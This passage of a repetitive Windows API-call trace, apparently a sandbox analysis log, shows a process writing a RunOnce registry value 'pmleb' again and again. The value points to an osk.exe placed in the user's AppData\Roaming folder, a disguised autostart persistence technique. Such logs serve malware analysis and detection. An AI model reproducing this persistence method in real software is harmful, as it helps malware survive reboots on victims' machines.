phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.396] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.396] RegCloseKey (hKey=0x280) returned 0x0 [0098.396] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.396] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.396] SetTimer (hWnd=0x20280, nIDEvent=0x22de, uElapse=0xa, lpTimerFunc=0x0) returned 0x22de [0098.396] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.410] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.410] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.410] KillTimer (hWnd=0x20280, uIDEvent=0x22de) returned 1 [0098.411] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.411] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.411] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.411] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.412] RegCloseKey (hKey=0x280) returned 0x0 [0098.412] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.412] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.412] SetTimer (hWnd=0x20280, nIDEvent=0x22df, uElapse=0xa, lpTimerFunc=0x0) returned 0x22df [0098.412] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.426] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.426] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.426] KillTimer (hWnd=0x20280, uIDEvent=0x22df) returned 1 [0098.426] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.427] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.427] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.427] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.427] RegCloseKey (hKey=0x280) returned 0x0 [0098.427] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.427] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.427] SetTimer (hWnd=0x20280, nIDEvent=0x22e0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e0 [0098.427] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.441] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.441] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.442] KillTimer (hWnd=0x20280, uIDEvent=0x22e0) returned 1 [0098.442] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.442] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.442] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.442] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.443] RegCloseKey (hKey=0x280) returned 0x0 [0098.443] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.443] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.443] SetTimer (hWnd=0x20280, nIDEvent=0x22e1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e1 [0098.443] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.457] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.457] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.457] KillTimer (hWnd=0x20280, uIDEvent=0x22e1) returned 1 [0098.457] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.458] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.458] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.458] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.458] RegCloseKey (hKey=0x280) returned 0x0 [0098.458] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.458] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.458] SetTimer (hWnd=0x20280, nIDEvent=0x22e2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e2 [0098.458] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.473] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.473] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.473] KillTimer (hWnd=0x20280, uIDEvent=0x22e2) returned 1 [0098.473] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.473] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.474] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.474] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.474] RegCloseKey (hKey=0x280) returned 0x0 [0098.474] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.474] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.474] SetTimer (hWnd=0x20280, nIDEvent=0x22e3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e3 [0098.474] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.488] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.488] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.488] KillTimer (hWnd=0x20280, uIDEvent=0x22e3) returned 1 [0098.489] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.489] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.489] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.489] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.490] RegCloseKey (hKey=0x280) returned 0x0 [0098.490] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.490] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.490] SetTimer (hWnd=0x20280, nIDEvent=0x22e4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e4 [0098.490] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.504] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.504] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.504] KillTimer (hWnd=0x20280, uIDEvent=0x22e4) returned 1 [0098.504] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.505] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.505] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.505] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.505] RegCloseKey (hKey=0x280) returned 0x0 [0098.505] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.505] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.505] SetTimer (hWnd=0x20280, nIDEvent=0x22e5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e5 [0098.505] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.519] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.519] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.520] KillTimer (hWnd=0x20280, uIDEvent=0x22e5) returned 1 [0098.520] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.520] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.521] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.521] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.522] RegCloseKey (hKey=0x280) returned 0x0 [0098.522] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.522] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.522] SetTimer (hWnd=0x20280, nIDEvent=0x22e6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e6 [0098.522] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.535] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.535] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.536] KillTimer (hWnd=0x20280, uIDEvent=0x22e6) returned 1 [0098.536] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.536] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.536] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.537] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.537] RegCloseKey (hKey=0x280) returned 0x0 [0098.537] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.537] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.537] SetTimer (hWnd=0x20280, nIDEvent=0x22e7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e7 [0098.537] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.551] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.551] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.551] KillTimer (hWnd=0x20280, uIDEvent=0x22e7) returned 1 [0098.551] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.552] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.552] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.552] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.552] RegCloseKey (hKey=0x280) returned 0x0 [0098.552] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.552] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.552] SetTimer (hWnd=0x20280, nIDEvent=0x22e8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e8 [0098.553] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.566] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.566] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.567] KillTimer (hWnd=0x20280, uIDEvent=0x22e8) returned 1 [0098.567] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.567] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.567] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.567] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.568] RegCloseKey (hKey=0x280) returned 0x0 [0098.568] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.568] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.568] SetTimer (hWnd=0x20280, nIDEvent=0x22e9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22e9 [0098.568] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.582] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.582] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.582] KillTimer (hWnd=0x20280, uIDEvent=0x22e9) returned 1 [0098.582] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.583] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.583] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.583] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.583] RegCloseKey (hKey=0x280) returned 0x0 [0098.583] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.583] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.583] SetTimer (hWnd=0x20280, nIDEvent=0x22ea, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ea [0098.583] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.597] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.597] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.598] KillTimer (hWnd=0x20280, uIDEvent=0x22ea) returned 1 [0098.598] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.598] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.598] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.598] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.599] RegCloseKey (hKey=0x280) returned 0x0 [0098.599] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.599] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.599] SetTimer (hWnd=0x20280, nIDEvent=0x22eb, uElapse=0xa, lpTimerFunc=0x0) returned 0x22eb [0098.599] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.613] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.613] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.613] KillTimer (hWnd=0x20280, uIDEvent=0x22eb) returned 1 [0098.613] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.614] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.614] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.614] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.614] RegCloseKey (hKey=0x280) returned 0x0 [0098.614] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.615] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.615] SetTimer (hWnd=0x20280, nIDEvent=0x22ec, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ec [0098.615] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.629] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.629] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.629] KillTimer (hWnd=0x20280, uIDEvent=0x22ec) returned 1 [0098.629] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.629] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.629] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.630] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.630] RegCloseKey (hKey=0x280) returned 0x0 [0098.630] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.630] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.630] SetTimer (hWnd=0x20280, nIDEvent=0x22ed, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ed [0098.630] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.644] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.645] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.645] KillTimer (hWnd=0x20280, uIDEvent=0x22ed) returned 1 [0098.645] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.645] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.645] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.646] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.646] RegCloseKey (hKey=0x280) returned 0x0 [0098.646] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.646] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.646] SetTimer (hWnd=0x20280, nIDEvent=0x22ee, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ee [0098.646] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.660] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.661] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.661] KillTimer (hWnd=0x20280, uIDEvent=0x22ee) returned 1 [0098.661] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.661] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.661] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.662] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.662] RegCloseKey (hKey=0x280) returned 0x0 [0098.662] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.662] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.662] SetTimer (hWnd=0x20280, nIDEvent=0x22ef, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ef [0098.662] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.675] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.675] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.676] KillTimer (hWnd=0x20280, uIDEvent=0x22ef) returned 1 [0098.676] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.676] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.676] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.676] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.677] RegCloseKey (hKey=0x280) returned 0x0 [0098.677] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.677] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.677] SetTimer (hWnd=0x20280, nIDEvent=0x22f0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f0 [0098.677] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, 